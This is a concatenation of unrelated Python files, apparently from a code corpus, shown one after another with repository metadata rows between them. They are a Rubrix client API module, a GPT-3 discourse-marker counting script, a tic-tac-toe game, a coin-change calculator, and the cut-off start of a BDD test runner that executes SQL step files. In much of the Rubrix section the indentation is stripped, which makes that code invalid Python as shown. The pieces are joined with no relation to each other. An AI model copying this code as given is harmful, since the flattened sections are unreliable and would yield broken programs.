        """Sets the active workspace.

        The workspace is propagated to the server via a request header on the
        underlying HTTP client.

        Args:
            workspace: The new workspace

        Raises:
            Exception: if ``workspace`` is None or not one of the user's workspaces.
        """
        if workspace is None:
            raise Exception("Must provide a workspace")
        if workspace != self.get_workspace():
            if workspace == self._user.username:
                # Personal workspace: drop any previously-set header first.
                # NOTE(review): the header is re-assigned right below anyway, so
                # this pop looks redundant — confirm intended behavior.
                self._client.headers.pop(RUBRIX_WORKSPACE_HEADER_NAME, workspace)
            elif (
                self._user.workspaces is not None
                and workspace not in self._user.workspaces
            ):
                raise Exception(f"Wrong provided workspace {workspace}")
            self._client.headers[RUBRIX_WORKSPACE_HEADER_NAME] = workspace
def get_workspace(self) -> str:
"""Returns the name of the active workspace.
Returns:
The name of the active workspace as a string.
"""
return self._client.headers.get(
RUBRIX_WORKSPACE_HEADER_NAME, self._user.username
)
def copy(self, dataset: str, name_of_copy: str, workspace: str = None):
"""Creates a copy of a dataset including its tags and metadata
Args:
dataset: Name of the source dataset
name_of_copy: Name of the copied dataset
workspace: If provided, dataset will be copied to that workspace
Examples:
>>> import rubrix as rb
>>> rb.copy("my_dataset", name_of_copy="new_dataset")
>>> rb.load("new_dataset")
"""
datasets_api.copy_dataset(
client=self._client,
name=dataset,
json_body=CopyDatasetRequest(name=name_of_copy, target_workspace=workspace),
)
def delete(self, name: str) -> None:
"""Deletes a dataset.
Args:
name: The dataset name.
Examples:
>>> import rubrix as rb
>>> rb.delete(name="example-dataset")
"""
datasets_api.delete_dataset(client=self._client, name=name)
def log(
self,
records: Union[Record, Iterable[Record], Dataset],
name: str,
tags: Optional[Dict[str, str]] = None,
metadata: Optional[Dict[str, Any]] = None,
chunk_size: int = 500,
verbose: bool = True,
background: bool = False,
) -> Union[BulkResponse, Future]:
"""Logs Records to Rubrix.
The logging happens asynchronously in a background thread.
Args:
records: The record, an iterable of records, or a dataset to log.
name: The dataset name.
tags: A dictionary of tags related to the dataset.
metadata: A dictionary of extra info for the dataset.
chunk_size: The chunk size for a data bulk.
verbose: If True, shows a progress bar and prints out a quick summary at the end.
background: If True, we will NOT wait for the logging process to finish and return an ``asyncio.Future``
object. You probably want to set ``verbose`` to False in that case.
Returns:
Summary of the response from the REST API.
If the ``background`` argument is set to True, an ``asyncio.Future`` will be returned instead.
Examples:
>>> import rubrix as rb
>>> record = rb.TextClassificationRecord(
... text="my first rubrix example",
... prediction=[('spam', 0.8), ('ham', 0.2)]
... )
>>> rb.log(record, name="example-dataset")
1 records logged to http://localhost:6900/datasets/rubrix/example-dataset
BulkResponse(dataset='example-dataset', processed=1, failed=0)
>>>
>>> # Logging records in the background
>>> rb.log(record, name="example-dataset", background=True, verbose=False)
<Future at 0x7f675a1fffa0 state=pending>
"""
future = self._agent.log(
records=records,
name=name,
tags=tags,
metadata=metadata,
chunk_size=chunk_size,
verbose=verbose,
)
if background:
return future
try:
return future.result()
finally:
future.cancel()
async def log_async(
self,
records: Union[Record, Iterable[Record], Dataset],
name: str,
tags: Optional[Dict[str, str]] = None,
metadata: Optional[Dict[str, Any]] = None,
chunk_size: int = 500,
verbose: bool = True,
) -> BulkResponse:
"""Logs Records to Rubrix with asyncio.
Args:
records: The record, an iterable of records, or a dataset to log.
name: The dataset name.
tags: A dictionary of tags related to the dataset.
metadata: A dictionary of extra info for the dataset.
chunk_size: The chunk size for a data bulk.
verbose: If True, shows a progress bar and prints out a quick summary at the end.
Returns:
Summary of the response from the REST API
Examples:
>>> # Log asynchronously from your notebook
>>> import asyncio
>>> import rubrix as rb
>>> from rubrix.utils import setup_loop_in_thread
>>> loop, _ = setup_loop_in_thread()
>>> future_response = asyncio.run_coroutine_threadsafe(
... rb.log_async(my_records, dataset_name), loop
... )
"""
tags = tags or {}
metadata = metadata or {}
if not name:
raise InputValueError("Empty dataset name has been passed as argument.")
if not re.match(DATASET_NAME_REGEX_PATTERN, name):
raise InputValueError(
f"Provided dataset name {name} does not match the pattern {DATASET_NAME_REGEX_PATTERN}. "
"Please, use a valid name for your dataset"
)
if chunk_size > self._MAX_CHUNK_SIZE:
_LOGGER.warning(
"""The introduced chunk size is noticeably large, timeout errors may occur.
Consider a chunk size smaller than %s""",
self._MAX_CHUNK_SIZE,
)
if isinstance(records, Record.__args__):
records = [records]
records = list(records)
try:
record_type = type(records[0])
except IndexError:
raise InputValueError("Empty record list has been passed as argument.")
if record_type is TextClassificationRecord:
bulk_class = TextClassificationBulkData
creation_class = CreationTextClassificationRecord
elif record_type is TokenClassificationRecord:
bulk_class = TokenClassificationBulkData
creation_class = CreationTokenClassificationRecord
elif record_type is Text2TextRecord:
bulk_class = Text2TextBulkData
creation_class = CreationText2TextRecord
else:
raise InputValueError(
f"Unknown record type {record_type}. Available values are {Record.__args__}"
)
processed, failed = 0, 0
progress_bar = tqdm(total=len(records), disable=not verbose)
for i in range(0, len(records), chunk_size):
chunk = records[i : i + chunk_size]
response = await async_bulk(
client=self._client,
name=name,
json_body=bulk_class(
tags=tags,
metadata=metadata,
records=[creation_class.from_client(r) for r in chunk],
),
)
processed += response.parsed.processed
failed += response.parsed.failed
progress_bar.update(len(chunk))
progress_bar.close()
# TODO: improve logging policy in library
if verbose:
_LOGGER.info(
f"Processed {processed} records in dataset {name}. Failed: {failed}"
)
workspace = self.get_workspace()
if (
not workspace
): # Just for backward comp. with datasets with no workspaces
workspace = "-"
print(
f"{processed} records logged to {self._client.base_url}/datasets/{workspace}/{name}"
)
# Creating a composite BulkResponse with the total processed and failed
return BulkResponse(dataset=name, processed=processed, failed=failed)
def delete_records(
self,
name: str,
query: Optional[str] = None,
ids: Optional[List[Union[str, int]]] = None,
discard_only: bool = False,
discard_when_forbidden: bool = True,
) -> Tuple[int, int]:
"""Delete records from a Rubrix dataset.
Args:
name: The dataset name.
query: An ElasticSearch query with the `query string syntax
<https://rubrix.readthedocs.io/en/stable/guides/queries.html>`_
ids: If provided, deletes dataset records with given ids.
discard_only: If `True`, matched records won't be deleted. Instead, they will be marked as `Discarded`
discard_when_forbidden: Only super-user or dataset creator can delete records from a dataset.
So, running "hard" deletion for other users will raise an `ForbiddenApiError` error.
If this parameter is `True`, the client API will automatically try to mark as ``Discarded``
records instead. Default, `True`
Returns:
The total of matched records and real number of processed errors. These numbers could not
be the same if some data conflicts are found during operations (some matched records change during
deletion).
Examples:
>>> ## Delete by id
>>> import rubrix as rb
>>> rb.delete_records(name="example-dataset", ids=[1,3,5])
>>> ## Discard records by query
>>> import rubrix as rb
>>> rb.delete_records(name="example-dataset", query="metadata.code=33", discard_only=True)
"""
return self.datasets.delete_records(
name=name,
query=query,
ids=ids,
mark_as_discarded=discard_only,
discard_when_forbidden=discard_when_forbidden,
)
def load(
self,
name: str,
query: Optional[str] = None,
ids: Optional[List[Union[str, int]]] = None,
limit: Optional[int] = None,
id_from: Optional[str] = None,
as_pandas=None,
) -> Dataset:
"""Loads a Rubrix dataset.
Parameters:
-----------
name:
The dataset name.
query:
An ElasticSearch query with the
`query string syntax <https://rubrix.readthedocs.io/en/stable/guides/queries.html>`_
ids:
If provided, load dataset records with given ids.
limit:
The number of records to retrieve.
id_from:
If provided, starts gathering the records starting from that Record. As the Records returned with the
load method are sorted by ID, ´id_from´ can be used to load using batches.
as_pandas:
DEPRECATED! To get a pandas DataFrame do ``rb.load('my_dataset').to_pandas()``.
Returns:
--------
A Rubrix dataset.
Examples:
**Basic Loading**: load the samples sorted by their ID
>>> import rubrix as rb
>>> dataset = rb.load(name="example-dataset")
**Iterate over a large dataset:**
When dealing with a large dataset you might want to load it in batches to optimize memory consumption
and avoid network timeouts. To that end, a simple batch-iteration over the whole database can be done
employing the `from_id` parameter. This parameter will act as a delimiter, retrieving the N items after
the given id, where N is determined by the `limit` parameter. **NOTE** If
no `limit` is given the whole dataset after that ID will be retrieved.
>>> import rubrix as rb
>>> dataset_batch_1 = rb.load(name="example-dataset", limit=1000)
>>> dataset_batch_2 = rb.load(name="example-dataset", limit=1000, id_from=dataset_batch_1[-1].id)
"""
if as_pandas is False:
warnings.warn(
"The argument `as_pandas` is deprecated and will be removed in a future version. "
"Please adapt your code accordingly. ",
FutureWarning,
)
elif as_pandas is True:
raise ValueError(
"The argument `as_pandas` is deprecated and will be removed in a future version. "
"Please adapt your code accordingly. ",
"If you want a pandas DataFrame do `rb.load('my_dataset').to_pandas()`.",
)
response = datasets_api.get_dataset(client=self._client, name=name)
task = response.parsed.task
task_config = {
TaskType.text_classification: (
text_classification_api.data,
TextClassificationQuery,
DatasetForTextClassification,
),
TaskType.token_classification: (
token_classification_api.data,
TokenClassificationQuery,
DatasetForTokenClassification,
),
TaskType.text2text: (
text2text_api.data,
Text2TextQuery,
DatasetForText2Text,
),
}
try:
get_dataset_data, request_class, dataset_class = task_config[task]
except KeyError:
raise ValueError(
f"Load method not supported for the '{task}' task. Supported tasks: "
f"{[TaskType.text_classification, TaskType.token_classification, TaskType.text2text]}"
)
response = get_dataset_data(
client=self._client,
name=name,
request=request_class(ids=ids, query_text=query),
limit=limit,
id_from=id_from,
)
records = [sdk_record.to_client() for sdk_record in response.parsed]
try:
records_sorted_by_id = sorted(records, key=lambda x: x.id)
# record ids can be a mix of int/str -> sort all as str type
except TypeError:
records_sorted_by_id = sorted(records, key=lambda x: str(x.id))
return dataset_class(records_sorted_by_id)
def dataset_metrics(self, name: str) -> List[MetricInfo]:
response = datasets_api.get_dataset(self._client, name)
response = metrics_api.get_dataset_metrics(
self._client, name=name, task=response.parsed.task
)
return response.parsed
def get_metric(self, name: str, metric: str) -> Optional[MetricInfo]:
metrics = self.dataset_metrics(name)
for metric_ in metrics:
if metric_.id == metric:
return metric_
def compute_metric(
self,
name: str,
metric: str,
query: Optional[str] = None,
interval: Optional[float] = None,
size: Optional[int] = None,
) -> MetricResults:
response = datasets_api.get_dataset(self._client, name)
metric_ = self.get_metric(name, metric=metric)
assert metric_ is not None, f"Metric {metric} not found !!!"
response = metrics_api.compute_metric(
self._client,
name=name,
task=response.parsed.task,
metric=metric,
query=query,
interval=interval,
size=size,
)
return MetricResults(**metric_.dict(), results=response.parsed)
def fetch_dataset_labeling_rules(self, dataset: str) -> List[LabelingRule]:
response = text_classification_api.fetch_dataset_labeling_rules(
self._client, name=dataset
)
return [LabelingRule.parse_obj(data) for data in response.parsed]
def rule_metrics_for_dataset(
self, dataset: str, rule: LabelingRule
) -> LabelingRuleMetricsSummary:
response = text_classification_api.dataset_rule_metrics(
self._client, name=dataset, query=rule.query, label=rule.label
)
return LabelingRuleMetricsSummary.parse_obj(response.parsed)
# Module-level singleton holding the currently-active client instance.
__ACTIVE_API__: Optional[Api] = None


def active_api() -> Api:
    """Returns the active API.

    If Active API is None, initialize a default one (reads config from the
    RUBRIX_* environment variables or falls back to the built-in defaults).
    """
    global __ACTIVE_API__
    if __ACTIVE_API__ is None:
        __ACTIVE_API__ = Api()
    return __ACTIVE_API__
def api_wrapper(api_method: Callable):
    """Build a decorator that exposes *api_method* as a module-level function.

    The decorated function inherits the method's docstring/metadata (via
    ``functools.wraps``) and its signature with the ``self`` parameter removed.
    Async methods are wrapped with an async wrapper so awaiting still works.
    """

    method_signature = signature(api_method)
    # Signature shown to users: the bound method's parameters minus `self`.
    public_params = [
        param
        for name, param in method_signature.parameters.items()
        if name != "self"
    ]

    def decorator(func):
        if asyncio.iscoroutinefunction(api_method):

            @wraps(api_method)
            async def wrapped_func(*args, **kwargs):
                return await func(*args, **kwargs)

        else:

            @wraps(api_method)
            def wrapped_func(*args, **kwargs):
                return func(*args, **kwargs)

        wrapped_func.__signature__ = method_signature.replace(parameters=public_params)
        return wrapped_func

    return decorator
# Module-level convenience functions: each delegates to the active Api
# instance while borrowing the corresponding method's docstring and signature.
@api_wrapper(Api.__init__)
def init(*args, **kwargs):
    # Replaces the module-level singleton with a freshly-configured client.
    global __ACTIVE_API__
    __ACTIVE_API__ = Api(*args, **kwargs)


@api_wrapper(Api.set_workspace)
def set_workspace(*args, **kwargs):
    return active_api().set_workspace(*args, **kwargs)


@api_wrapper(Api.get_workspace)
def get_workspace(*args, **kwargs):
    return active_api().get_workspace(*args, **kwargs)


@api_wrapper(Api.copy)
def copy(*args, **kwargs):
    return active_api().copy(*args, **kwargs)


@api_wrapper(Api.delete)
def delete(*args, **kwargs):
    return active_api().delete(*args, **kwargs)


@api_wrapper(Api.log)
def log(*args, **kwargs):
    return active_api().log(*args, **kwargs)


@api_wrapper(Api.log_async)
def log_async(*args, **kwargs):
    return active_api().log_async(*args, **kwargs)


@api_wrapper(Api.load)
def load(*args, **kwargs):
    return active_api().load(*args, **kwargs)


@api_wrapper(Api.delete_records)
def delete_records(*args, **kwargs):
    return active_api().delete_records(*args, **kwargs)
class InputValueError(RubrixClientError):
    """Raised when user-supplied arguments to the client API are invalid."""
    pass
| Skumarh89/rubrix | src/rubrix/client/api.py | api.py | py | 24,714 | python | en | code | null | github-code | 36 |
71707177064 | import openai
import csv
import argparse
from collections import Counter
from typing import List
from data.discourse_connectors import discourse_connectors
# Ihr OpenAI GPT-3 API-Schlüssel
api_key = "[insert your API KEY here]"
def parse_arguments() -> argparse.Namespace:
    """Parse the CLI arguments: corpus path and number of articles to compare."""
    parser = argparse.ArgumentParser(description='Vergleicht die Häufigkeit von Diskursmarkern in Artikeln und GPT-3 Texten.')
    parser.add_argument('korpus', help='Pfad zum TSV-Korpus')
    parser.add_argument('--anzahl_artikel', type=int, default=10, help='Anzahl der zu vergleichenden Artikel')
    return parser.parse_args()
def count_connectors(text: str, connectors: List[str]) -> Counter:
    """Count how often each discourse connector occurs in *text*.

    Fixes a malformed signature (``connectors, List`` instead of
    ``connectors: List``) that made ``List`` a required third positional
    parameter — every call site passes only two arguments and would have
    raised ``TypeError``.

    Matching is case-insensitive and whitespace-token based, so connectors
    glued to punctuation (e.g. ``"however,"``) are not matched.

    :param text: The text to scan.
    :param connectors: Connectors to look for (expected lowercase).
    :return: Counter mapping each found connector to its frequency.
    """
    words = text.lower().split()
    return Counter(word for word in words if word in connectors)
def get_gpt_text(prompt: str, token_limit: int) -> str:
    """Request a GPT-3 completion for *prompt*, capped at *token_limit* tokens.

    NOTE(review): mutates the global ``openai.api_key`` on every call and has
    no retry/error handling for API failures.
    """
    openai.api_key = api_key
    response = openai.Completion.create(
        engine="text-davinci-002",
        prompt=prompt,
        max_tokens=token_limit
    )
    # Return only the generated text, stripped of surrounding whitespace.
    return response.choices[0].text.strip()
def trim_to_same_length(article_text: str, gpt_text: str) -> (str, str):
    """Cut both texts down to the shorter one's word count and return the pair."""
    article_words = article_text.split()
    gpt_words = gpt_text.split()
    limit = min(len(article_words), len(gpt_words))
    return ' '.join(article_words[:limit]), ' '.join(gpt_words[:limit])
def sum_total_connectors(counter: Counter) -> int:
    """Return the total number of connector occurrences recorded in *counter*."""
    total = 0
    for occurrences in counter.values():
        total += occurrences
    return total
def main():
"""
Pseudo-Code für main():
1. CLI-Argumente parsen.
2. Öffne den Korpus und lese die angegebene Anzahl an Artikeln.
3. Für jeden Artikel:
a. Nutze die ersten 10 Sätze als Prompt für GPT-3.
b. Generiere den GPT-3 Text.
c. Kürze Artikel und GPT-3 Text auf die gleiche Länge.
d. Zähle die Diskursmarker in beiden Texten.
e. Schreibe die Ergebnisse in die CSV-Datei.
4. Berechne die Durchschnittswerte und gib sie im Terminal aus.
"""
args = parse_arguments()
# Ausgabe-CSV-Datei vorbereiten
with open('output.csv', 'w', newline='', encoding='utf-8') as csvfile:
fieldnames = ['Head', 'Article_Connectors', 'Article_Text', 'GPT_Connectors', 'GPT_Text']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
article_connector_totals = []
gpt_connector_totals = []
# Korpus öffnen und Artikel lesen
with open(args.korpus, 'r', encoding='utf-8') as f:
reader = csv.DictReader(f, delimiter='\t')
for i, row in enumerate(reader):
if i >= args.anzahl_artikel:
break
# Prompt für GPT-3 erstellen
article_text = row['content']
head = row['head']
prompt = '. '.join(article_text.split('. ')[:10])
# GPT-3 Text generieren
token_limit = len(article_text.split())
gpt_text = get_gpt_text(prompt, token_limit)
# Texte auf gleiche Länge kürzen
article_text, gpt_text = trim_to_same_length(article_text, gpt_text)
# Diskursmarker zählen
article_counts = count_connectors(article_text, discourse_connectors)
gpt_counts = count_connectors(gpt_text, discourse_connectors)
article_total = sum_total_connectors(article_counts)
gpt_total = sum_total_connectors(gpt_counts)
# Ergebnisse in der CSV-Datei speichern
writer.writerow({'Head': head, 'Article_Connectors': article_total, 'Article_Text': article_text, 'GPT_Connectors': gpt_total, 'GPT_Text': gpt_text})
article_connector_totals.append(article_total)
gpt_connector_totals.append(gpt_total)
# Durchschnittswerte berechnen
avg_article_total = sum(article_connector_totals) / args.anzahl_artikel
avg_gpt_total = sum(gpt_connector_totals) / args.anzahl_artikel
# Durchschnittswerte im Terminal ausgeben
print(f"Durchschnittliche Diskursmarker im Artikel: {avg_article_total}")
print(f"Durchschnittliche Diskursmarker im GPT-Text: {avg_gpt_total}")
if __name__ == '__main__':
main()
"""
Output:
Durchschnittliche Diskursmarker im Artikel: 26.1
Durchschnittliche Diskursmarker im GPT-Text: 24.6
""" | SandroWick/gpt_discourseconnectives_counter | gpt_discourseconnectives_project.py | gpt_discourseconnectives_project.py | py | 4,623 | python | de | code | 0 | github-code | 36 |
19905228937 | import random
# Print board
def print_board(board):
    """Render the 3x3 board (a flat 9-element list) with ASCII separators."""
    separator = "+---+---+---+"
    print(separator)
    for row_start in range(0, 9, 3):
        row = " | ".join(board[row_start:row_start + 3])
        print(f"| {row} | \n{separator}")
# Check who is the winner
def check_winner(board):
    """Return "X" or "O" if that player has three in a row, else None."""
    lines = (
        (0, 1, 2), (3, 4, 5), (6, 7, 8),  # rows
        (0, 3, 6), (1, 4, 7), (2, 5, 8),  # columns
        (0, 4, 8), (2, 4, 6),             # diagonals
    )
    for a, b, c in lines:
        mark = board[a]
        if mark != " " and mark == board[b] == board[c]:
            return mark
    return None
# Prompt the human player for a move.
def get_human_move(board):
    """Prompt until the user names an empty cell 1-9; return its 0-based index."""
    while True:
        choice = input("Enter a move (1-9): ")
        if choice.isdigit() and 1 <= int(choice) <= 9 and board[int(choice) - 1] == " ":
            return int(choice) - 1
        print("Invalid move, try again.")
# Choose the computer's move.
def get_computer_move(board):
    """Return the computer's move index: win now if possible, else block the
    human's immediate win, else pick a random open cell."""
    open_cells = [idx for idx in range(9) if board[idx] == " "]
    # First look for a winning "O" move, then for a move that blocks "X".
    for mark in ("O", "X"):
        for idx in open_cells:
            trial = list(board)
            trial[idx] = mark
            if check_winner(trial) == mark:
                return idx
    # No decisive move exists: fall back to chance.
    return random.choice(open_cells)
def main():
    """Run an interactive human-vs-computer tic-tac-toe game.

    The computer plays "O" and moves whenever the number of filled cells is
    even, so the computer always takes the first turn.
    """
    board = [" " for i in range(9)]
    while True:
        print_board(board)
        # Check for a finished game before asking for the next move.
        winner = check_winner(board)
        if winner:
            print(f"{winner} wins!")
            break
        if " " not in board:
            print("Tie!")
            break
        # Turn order by parity of filled cells: even -> computer ("O").
        if len([i for i in board if i != " "]) % 2 == 0:
            move = get_computer_move(board)
            board[move] = "O"
            print(f"Computer played move {move + 1}.")
        else:
            move = get_human_move(board)
            board[move] = "X"
            print(f"Human played move {move + 1}.")
if __name__ == "__main__":
    main()
| kpeeva/tictactoe | game.py | game.py | py | 2,134 | python | en | code | 0 | github-code | 36 |
21394122423 | Denominations = {1:[2000,500,200,100,50,20,10,5,2,1],2:[100,50,20,10,5,2,1,0.50,0.25,0.10,0.05,0.01],3:[50,20,10,5,2,1,0.5,0.2,0.1,0.05,0.02,0.01],4:[10000,5000,2000,1000,500,100,50,10,5,1],5:[100,50,20,10,5,2,1,0.5,0.2,0.1,0.05,0.02,0.01]}
def checkval(s):
    """Prompt for a positive amount in currency ``s`` (a validated key of
    Denominations) and return it rounded to that currency's precision.

    INR (1) and JPY (4) amounts round to whole units; USD/GBP/CNY round to
    2 decimal places. Re-prompts on negative, non-numeric or too-small input.
    """
    while(True):
        value = input("--> Enter the amount you wish to obtain the equivalent change for: ")
        try:
            value = float(value)
            if value < 0:
                print(".\n"*3)
                print(" ERROR !!! YOU HAVE ENTERED A NEGATIVE VALUE !!! PLEASE TRY AGAIN !!!")
            else:
                low_val_check = min(Denominations[s])
                # NOTE(review): amounts equal to the smallest denomination are
                # also rejected -- presumably deliberate ("change" meaning a
                # break into smaller units); confirm intent.
                if value<=low_val_check:
                    print(".\n"*3)
                    print(" ERROR !!! LOWER DENOMINATION DOES NOT EXIST, PLEASE ENTER A VALUE FOR WHICH CHANGE CAN BE OBTAINED !!!")
                else:
                    if s == 1 or s == 4:
                        print("\nYour Number Might be Rounded to the nearest integer due to Notes existing only in integer formats given the chosen currency. . . . ")
                        return round(value)
                    elif s == 2 or s==3 or s==5 :
                        print("\nYour Number Might be Rounded to 2 decimal places due to Notes existing only in integer formats given the chosen currency. . . . ")
                        return round(value,2)
        except ValueError:
            print(".\n"*3)
            print("YOUR ENTRY HAS INVALID CHARACTERS IN IT !!! PLEASE ENTER A NUMERICAL AMOUNT !!!")
def checkcurr(s):
    """Coerce ``s`` to an int in 1..5, re-prompting on bad input; return the
    validated currency choice."""
    while True:
        try:
            choice = int(s)
        except ValueError:
            # Entry was not numeric at all.
            print(".\n"*3)
            print("ERROR !!! ENTRY CONTAINS INVALID CHARACTERS !!! PLEASE TRY AGAIN !!! \n")
            s = input("Enter The Numerical Value for your desired currency: ")
            continue
        if 1 <= choice <= 5:
            return choice
        # Numeric but outside the menu range.
        print(".\n"*3)
        print("ERROR !!! NUMBER NOT IN SPECIFIED RANGE !!! PLEASE TRY AGAIN !!! \n")
        s = input("Enter The Numerical Value for your desired currency: ")
def calc_change(c,a):
    """Break amount ``a`` of currency ``c`` into denominations, largest first.

    c -- currency code (key into the module-level Denominations table)
    a -- amount to change (whole units for INR/JPY, 2-decimal value otherwise)
    Returns a human-readable string listing the count of each note/coin.

    All arithmetic is done in integer hundredths so that repeated division
    and modulo stay exact. The original float version lost coins to
    round-off: e.g. 0.30 % 0.25 == 0.04999..., so 30 cents yielded
    1 quarter + 4 pennies instead of 1 quarter + 1 nickel.
    """
    list_of_denominations = Denominations[c]
    string = "Your Change is :"
    # Remaining amount in integer hundredths (paise/cents/pence/...).
    remaining = round(a * 100)
    flag = 0
    for i in list_of_denominations:
        unit = round(i * 100)
        # Quirk preserved from the original: the flag skips paying out a
        # single note when the amount exactly equals the top denomination.
        if remaining != unit:
            flag = 1
        if remaining >= unit and flag == 1:
            count = remaining // unit
            part_of_change = str(count)
            remaining -= count * unit
            if c == 1:
                if i > 5:
                    string += " ' "+part_of_change+"' "+str(i)+' Rupee Note/s'
                else:
                    string += " ' "+part_of_change+"' "+str(i)+' Rupee Coin/s'
            elif c== 4:
                if i >= 1000:
                    string += " ' "+part_of_change+"' "+str(i)+' Yen Note/s'
                else:
                    string += " ' "+part_of_change+"' "+str(i)+' Yen Coin/s'
            elif c== 2:
                if i >= 1:
                    string += " ' "+part_of_change+"' "+str(i)+' Dollar Note/s'
                elif i == 0.01:
                    string += " ' "+part_of_change+"' "+str(int(i*100))+' Penny/ies'
                elif i == 0.05:
                    string += " ' "+part_of_change+"' "+str(int(i*100))+' nickel/s'
                elif i == 0.1:
                    string += " ' "+part_of_change+"' "+str(int(i*100))+' Dime/s'
                elif i==0.25:
                    string += " ' "+part_of_change+"' "+str(int(i*100))+' Quarter/s'
                elif i==0.5:
                    # Missing space before "Half" kept from the original output.
                    string += " ' "+part_of_change+"' "+str(int(i*100))+'Half Dollar/s'
            elif c == 3:
                if i >= 5:
                    # Original omits the leading space in this one branch; kept.
                    string += "' "+part_of_change+"' "+str(i)+' Pound Note/s'
                elif i==2 or i == 1:
                    string += " ' "+part_of_change+"' "+str(i)+' Pound Coin/s'
                else:
                    string += " ' "+part_of_change+"' "+str(i)+' Pence'
            else:
                # NOTE(review): Yuan labels print i*100 (e.g. "10000 Yuan
                # Note/s" for a 100-yuan note) exactly as the original did;
                # confirm whether that scaling is intended.
                if i >= 0.1:
                    string += " ' "+part_of_change+"' "+str(int(i*100))+' Yuan Note/s'
                else:
                    string += " ' "+part_of_change+"' "+str(int(i*100))+' Yuan Coin/s'
    return string
def main():
    """Menu loop: pick a currency, enter an amount, print its change, repeat
    until the user answers 'n'."""
    ans = 'y'
    while(ans == 'y'):
        # Banner.
        print(" "*10+"*-"*35+"*")
        print(" "*35+"COIN CHANGE MAKER")
        print(" "*10+"*-"*35+"*","\n")
        print("--> Choose the NUMERICAL VALUE corresponding to the currency you wish to obtain the change in :\n1) Indian Rupee (₹) \n2) American Dollar ($) \n3) British Pound (£) \n4) Japanese Yen (¥) \n5) Chinese Yuan (CN¥) \n")
        int_value = input("Enter The Numerical Value for your desired currency: ")
        currency = checkcurr(int_value)
        print(".\n"*3)
        print("OPTION SAVED......\n")
        amount = checkval(currency)
        print(".\n"*3)
        print("OPTION SAVED......\n")
        answer = calc_change(currency,amount)
        print(answer)
        print("Do you wish to continue using the Program ? Press 'y' to continue and 'n' to terminate")
        ans = input()
        # Re-prompt until the answer is exactly 'y' or 'n'.
        while(True):
            if ans not in ['y','n']:
                print("ERROR !!! INVALID ENTRY DETECTED !!! PLEASE TRY AGAIN !!!")
                print(".\n"*3)
                print("Do you wish to continue using the Program ? Press 'y' to continue and 'n' to terminate")
                ans = input()
            else:
                break
if __name__ == "__main__":
    main()
9487574383 | import os, glob
from sqlalchemy import *
import sqlalchemy.exc
from sqlalchemy.orm import sessionmaker
from parse import *
from lxml import etree
from datetime import datetime, date, time
# BDD step keywords mapped to numeric codes.
step_types = {
    'given': 0,
    'when': 1,
    'then': 2
}
# Normalise the working directory to the project root when the process was
# started from inside features/ or features/steps/.
curpath = os.path.basename(os.getcwd())
if curpath == 'steps':
    os.chdir('..')
if curpath == 'features':
    os.chdir('..')
global_vars = dict()
connect_config = dict()
link_config = dict()
# Load settings.py from the current or parent directory, if present.
# SECURITY NOTE: exec() runs arbitrary code from settings.py -- only safe
# when that file is trusted/project-controlled.
try:
    exec(open("./settings.py").read(), global_vars)
except FileNotFoundError:
    try:
        exec(open("../settings.py").read(), global_vars)
    except FileNotFoundError:
        pass
# Pull the two expected config dicts out of the executed settings, keeping
# the empty defaults when settings.py did not define them.
try:
    connect_config = global_vars['connect_config']
    link_config = global_vars['link_config']
except:
    pass
class TestModule:
    """Runs BDD step predicates stored as .sql files against a SQL Server
    database (via SQLAlchemy) and threads an XML <context> document through
    the steps."""
    def __init__(self, module_name):
        self.module_name = module_name
        # One list of row-dicts per intermediate result set returned by steps.
        self.results = []
        self.connect_list = dict()
    def run_predicate_from_file(self, predicate, step_type):
        """Find the .sql file matching ``<step_type> <predicate>`` under
        ./features/steps, execute it (or the stored procedure it names) and
        return the updated context XML as a string, or None when no SQL ran.

        ``--!name=value`` lines inside the file configure the run: 'connect'
        (connection string or link_config alias) selects the database, and
        'schema_name'/'proc_name' switch from raw-script to EXEC mode.

        NOTE(review): relies on self.ctx_table / self.ctx_xml being set by
        the caller beforehand -- neither is initialised in __init__; confirm.
        """
        predicate_template = "./features/steps/{step_type}*.sql"
        # Parameter lines look like: --!connect=mssql+pymssql://...
        param_value_tmpl = "--!{param}={value}"
        predicate_format = predicate_template.format(step_type=step_type)
        params = dict()
        filename_params = dict()
        sql_command = ""
        is_sql_command = 0
        filename = ""
        cmd = ""
        # T-SQL scaffolding: variable declarations plus the procedure's
        # parameter list, both extended as filename placeholders are found.
        decl = 'DECLARE @context XML,\n@table XML,\n'
        prms = "\t@context = @context OUTPUT,\n"
        prms += "\t@table = @table,\n"
        def process_file(fn):
            # Read a step file: harvest --! parameters into ``params`` and
            # return either the raw SQL text or an EXEC statement when both
            # schema_name and proc_name parameters are present.
            # NOTE(review): reads the loop variable ``g`` from the enclosing
            # scope rather than its ``fn`` argument.
            sql_command = ""
            is_sql = 0
            schema = ""
            proc_name = ""
            with open(g, 'r') as f:
                for line in f:
                    p = parse(param_value_tmpl, line)
                    if p != None and len(p.named) > 0:
                        params[p.named['param']] = p.named['value']
                    sql_command += line
            try:
                sql_command = 'EXEC {}.{}'.format(params['schema_name'], params['proc_name'])
                schema, proc_name = params['schema_name'], params['proc_name']
            except:
                # Missing schema/proc parameters: treat as a raw script.
                is_sql = 1
            return sql_command, is_sql, schema, proc_name
        for g in glob.iglob(predicate_format):
            filename = os.path.basename(os.path.splitext(g)[0])
            step_filename = "{0} {1}".format(step_type, predicate)
            if filename == step_filename:
                # Exact filename match.
                cmd, is_sql_command, schema, proc_name = process_file(g)
                break
            else:
                # The filename may be a parse() pattern; captured fields
                # become NVARCHAR parameters passed to the step.
                fd = parse(filename, step_filename)
                if fd != None and len(fd.named) > 0:
                    for k in fd.named:
                        vl = fd.named[k]
                        decl += "\t@{} NVARCHAR(128) = '{}',\n".format(k, vl)
                        prms += "\t@{} = @{},\n".format(k, k)
                    cmd, is_sql_command, schema, proc_name = process_file(g)
                    break
        # Serialise the scenario data table into <context><table><row .../>.
        context = etree.Element("context")
        table = etree.SubElement(context, "table")
        if self.ctx_table is not None:
            for ct in self.ctx_table:
                row = etree.SubElement(table, 'row')
                for hd in ct.headings:
                    row.set(hd, ct[hd])
        ctx_str = etree.tostring(context)
        if len(cmd) > 0:
            # Escape single quotes so the XML embeds in a T-SQL literal.
            ctx_str = str(ctx_str.decode("utf-8")).replace("'", "''")
            decl = decl[:-2] + "\n\nSET @table = '{}'".format(ctx_str)
            try:
                decl += "\n\nSET @context = '{}'".format(self.ctx_xml)
            except AttributeError:
                pass
            cmd = decl + "\n\n" + cmd + "\n"
            cmd += prms[:-2] if is_sql_command == 0 else ''
            cmd += "\n\nSELECT @context AS behave_result"
